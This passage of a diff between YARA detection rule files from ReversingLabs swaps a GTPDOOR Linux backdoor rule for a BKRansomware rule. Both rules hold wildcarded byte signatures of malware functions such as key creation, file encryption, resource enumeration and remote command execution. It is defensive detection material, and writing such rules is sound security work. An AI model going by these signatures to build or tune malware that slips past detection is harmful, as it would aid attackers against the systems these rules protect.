-            8B CE 48 8B D8 E8 ?? ?? ?? ?? 48 8B CD E8 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? 48 8B
-            CE E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B C3 48 8B 5C 24 ?? 48 83 C4 ?? 41 5F
-            41 5E 5F 5E 5D C3
+		$create_key = {
+            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 57 8D 45 ?? 50 8D 45 ?? 50
+            33 DB 53 6A ?? 53 FF 75 ?? BE ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 53 6A ?? 53 FF 35 ?? ?? ?? ??
+            FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0 ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ??
+            53 53 53 FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 8B 35 ?? ?? ?? ??
+            03 C8 51 6A ?? FF D6 8B F8 89 7D ?? 3B FB 0F 84 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 57 FF
+            15 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 8B 45 ?? 03 C7 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83
+            C4 ?? 8D 45 ?? 50 8B 45 ?? 53 6A ?? 03 C8 51 57 8B 3D ?? ?? ?? ?? FF D7 85 C0 74 ??
+            FF 75 ?? 6A ?? FF D6 8B F0 3B F3 74 ?? 8B 4D ?? 8D 45 ?? 50 8B 45 ?? 56 6A ?? 03 C8
+            51 FF 75 ?? FF D7 33 FF 38 1E 74 ?? 8B C6 80 38 ?? 75 ?? 40 40 8A 08 88 0C 37 47 40
+            38 18 75 ?? 88 1C 37 EB ?? 8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 75 ?? FF 75
+            ?? FF 15 ?? ?? ?? ?? 5F 5B EB ?? 8B 75 ?? 8B C6 5E 83 C5 ?? C9 C2
         }
-		$get_network_interfaces_p1 = {
-            48 8B C4 48 89 58 ?? 48 89 70 ?? 57 41 56 41 57 48 81 EC ?? ?? ?? ?? B9 ?? ?? ?? ??
-            89 48 ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ??
-            48 8B C8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CE E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8B
-            C3 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B CE FF
-            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 8B F6 48 85 F6 0F 84 ?? ?? ?? ?? 4C 8D 3D
-            ?? ?? ?? ?? 48 83 64 24 ?? ?? 48 8D 05 ?? ?? ?? ?? 4D 8D 86 ?? ?? ?? ?? 48 89 44 24
-            ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 45 8B 8E ?? ?? ?? ?? 48 8B
-            F8 41 8B C9 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74
-            ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 F9 ?? 74 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ??
-            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D
-            15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15
-            ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ??
-            ?? ?? ?? 45 33 C0 48 8B CF E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D 86 ?? ?? ?? ?? 48
+		$create_lst_file = {
+            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 53 56 68 ?? ?? ?? ?? 33 F6 6A ?? 89 75 ?? FF 15 ??
+            ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 45 ?? 8B 38 8D 45
+            ?? 50 53 83 C7 ?? FF 15 ?? ?? ?? ?? 03 C0 50 53 FF 75 ?? FF 17 8B 45 ?? 8B 08 8D 55
+            ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 53 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 8B 08
+            8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ??
+            8B 3D ?? ?? ?? ?? 56 56 56 56 6A ?? 50 56 68 ?? ?? ?? ?? FF D7 89 45 ?? 3B C6 0F 84
+            ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 56
+            56 FF 75 ?? 50 6A ?? FF 75 ?? 56 68 ?? ?? ?? ?? FF D7 8D 45 ?? 50 6A ?? 68 ?? ?? ??
+            ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 E0 ?? 83
+            C0 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D ??
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 56 56
+            56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 6A ?? 53 56 FF 15 ?? ?? ??
+            ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 57 53 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
+            89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57
+            8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 7D ?? 75 ?? FF 75 ?? C7 45 ??
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 3B FE 74 ?? 56 6A ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 56 57 53 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            5F 8B 45 ?? 8B 08 50 FF 51 ?? 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 5E 5B 83 C5 ?? C9 C2
         }
-		$get_network_interfaces_p2 = {
-            8B C8 48 8D 15 ?? ?? ?? ?? 4D 8B CF E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D 86 ?? ??
-            ?? ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D
-            86 ?? ?? ?? ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 41 83 BE ?? ??
-            ?? ?? ?? 48 8B C8 74 ?? 48 83 64 24 ?? ?? 4D 8D 8E ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ??
-            4C 89 7C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 45 33 C0 48 8D 15 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 41 83 BE ?? ?? ?? ?? ?? 74 ?? 4D 8D 86 ?? ?? ?? ?? 45 33 C9 48 8D
-            15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4D 8D 86 ?? ?? ?? ?? 41 80 38 ?? 74 ?? 45 33
-            C9 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4D 8B 36 48 8D 15 ?? ?? ?? ?? 45 33
-            C0 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 4D 85 F6 0F 85 ?? ?? ?? ?? EB ?? 48 85 F6 74 ??
-            48 8B CE E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF 48 8B D8 E8 ?? ?? ?? ?? 48
-            8B C3 EB ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41
-            5E 5F C3
+		$enumerate_resources = {
+            55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 BE ?? ?? ?? ?? 56 6A ?? FF D3 8B F8 89 7D ??
+            85 FF [2-8] 83 4D ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? 89 75 ?? E8
+            ?? ?? ?? ?? 85 C0 75 ?? 39 45 ?? 74 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 [0-3]
+            E8 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 36 FF 15 ?? ?? ?? ?? 8D 44 00 ?? 50 6A
+            ?? FF D3 8B F8 85 FF 74 ?? FF 36 57 FF 15 ?? ?? ?? ?? [0-5] 57 E8 ?? ?? ??
+            ?? 57 FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 75 ?? 8B 7D ?? 57 FF 15 ?? ?? ?? ?? FF 75
+            ?? E8 ?? ?? ?? ?? 5F 5E 5B C9 C2
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( $get_system_information ) and ( all of ( $get_dns_servers_p* ) ) and ( all of ( $get_network_interfaces_p* ) )
+		uint16( 0 ) == 0x5A4D and ( ( $create_key_file and $create_lst_file and $enumerate_resources and $encrypt_files ) or ( $create_key and $enumerate_resources and $encrypt_files ) )
 }
-rule REVERSINGLABS_Linux_Backdoor_GTPDOOR : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Bkransomware : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects GTPDOOR backdoor."
+		description = "Yara rule that detects BKRansomware ransomware."
 		author = "ReversingLabs"
-		id = "9e6df856-fe54-504c-8530-321adc91cd5a"
-		date = "2024-09-10"
-		modified = "2024-09-10"
+		id = "88dc5c4a-046a-52e2-b108-0a90b91d4fb6"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.GTPDOOR.yara#L1-L264"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BKRansomware.yara#L1-L79"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b7b4b33b7838142e34c6d02260b6585305c4730c90e12b1adc099f9aeecf071a"
+		logic_hash = "3118098f05a13bd161af0cb1ec322878b371ff70b9f3815a04115a214c0965a2"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "GTPDOOR"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BKRansomware"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$send_result_to_peer_v1_p1 = {
-            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 66 89 85 ?? ?? ?? ?? 66 89 95
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? ?? ?? ?? ?? 77 ?? 0F B7 8D
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? 89 C7 89 D6 FC F3 A4 EB ?? 8D 85 ?? ?? ?? ??
-            8B 55 ?? 89 C1 B8 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 0C 24 E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ??
-            8B 55 ?? 8B 45 ?? 89 42 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 89 C2 8D 85 ?? ?? ??
-            ?? 01 D0 89 45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 8B 45
-            ?? 0F B7 10 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 89 C2 8D 85
-            ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ??
-            89 C2 8D 85 ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? ??
-            ?? ?? ?? 76 ?? 8B 45 ?? 83 C0 ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? EB ?? 8B
-            45 ?? 83 C0 ?? 0F B7 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 45 ??
-            89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83
-        }
-		$send_result_to_peer_v1_p2 = {
-            C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 85
-            ?? ?? ?? ?? 66 89 42 ?? 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ??
-            ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D
-            50 ?? 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89
-            C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 66 89
-            45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 8B 5D ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 8B
-            40 ?? 89 4C 24 ?? 89 5C 24 ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ??
-            83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7
-            40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 8D 95 ?? ?? ?? ?? 89 44 24 ?? 89 14 24 E8 ?? ?? ??
-            ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ??
-            ?? ?? ?? 8B 45 ?? 0F B7 40 ?? 66 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 83
-            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 85
-            ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F
-            5D C3
-        }
-		$execute_remote_command_v1 = {
-            55 89 E5 57 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
-            B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 03 45
-            ?? 66 C7 00 ?? ?? C6 40 ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B
-            7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 66 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
-            ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 0F B7 45 ?? 89 C2 03 55 ?? 8B 45 ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ??
-            B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 0F B7 C0 89 45 ?? EB ?? 8B 45
-            ?? 89 04 24 E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 89 C2 03 55 ?? 0F
-            B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
-            ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? 83 C4 ?? 5F 5D C3
-        }
-		$send_reply_v1_p1 = {
-            55 89 E5 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89
-            45 ?? 8D 85 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
-            14 24 E8 ?? ?? ?? ?? 8B 55 ?? 0F B6 02 83 E0 ?? 83 C8 ?? 88 02 8B 55 ?? 0F B6 02 83
-            E0 ?? 83 C8 ?? 88 02 8B 45 ?? C6 40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2
-            8B 45 ?? 66 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ??
-            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E0 ?? 8B 55 ?? 89 C1 83 E1 ?? 0F B6 42 ?? 83
-            E0 ?? 09 C8 88 42 ?? 8B 45 ?? 0F B6 50 ?? 8B 45 ?? 88 50 ?? 8B 45 ?? C6 40 ?? ?? 8B
-            45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? C7 44 24 ?? ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45
-            ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ??
-            ?? 89 45 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 66 89 10 8B 45 ?? 0F B7 10 8B 45 ?? 66 89
-            50 ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ??
-            ?? ?? ?? 66 89 45 ?? 0F B7 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 89 04 24 E8 ?? ??
-            ?? ?? 89 C2 8B 45 ?? 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66
-            89 50 ?? EB ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89
-        }
-		$send_reply_v1_p2 = {
-            50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6
-            42 ?? 83 E0 ?? 88 42 ?? 8B 55 ?? 0F B6 42 ?? 83 E0 ?? 83 C8 ?? 88 42 ?? 8B 45 ?? C6
-            40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B
-            40 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6
-            85 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ??
-            8D 85 ?? ?? ?? ?? 8D 48 ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ??
-            8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04
-            24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44
-            24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ??
-            89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8B
-            45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89
-        }
-		$send_reply_v1_p3 = {
-            41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8D 85 ?? ?? ?? ?? 8D 48
-            ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42
-            ?? 89 41 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 95
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? 39 C2 0F 85 ?? ?? ?? ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 74 ??
-            8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 85 C0 75
-            ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 14 C5 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? 29 D0 89 C1 B8 ?? ?? ?? ?? D3 E0 89 45 ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 23
-            45 ?? 89 45 ?? 8B 45 ?? 23 45 ?? 89 45 ?? 8B 45 ?? 3B 45 ?? 75 ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? 83 45 ?? ?? 83 7D ?? ?? 7E ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ??
-            ?? 75 ?? 8B 45 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            8B 0D ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-        }
-		$daemon_already_running_check_v1 = {
-            55 89 E5 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 74 ?? E8
-            ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? EB ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE
-            89 C8 F7 D0 83 E8 ?? 83 C0 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 5F 5D C3
-        }
-		$send_result_to_peer_v2_p1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89 8D ??
-            ?? ?? ?? 44 89 C0 66 89 95 ?? ?? FF FF 66 89 85 ?? ?? FF FF 48 8D BD ?? ?? ?? ?? BA
-            ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? FF FF
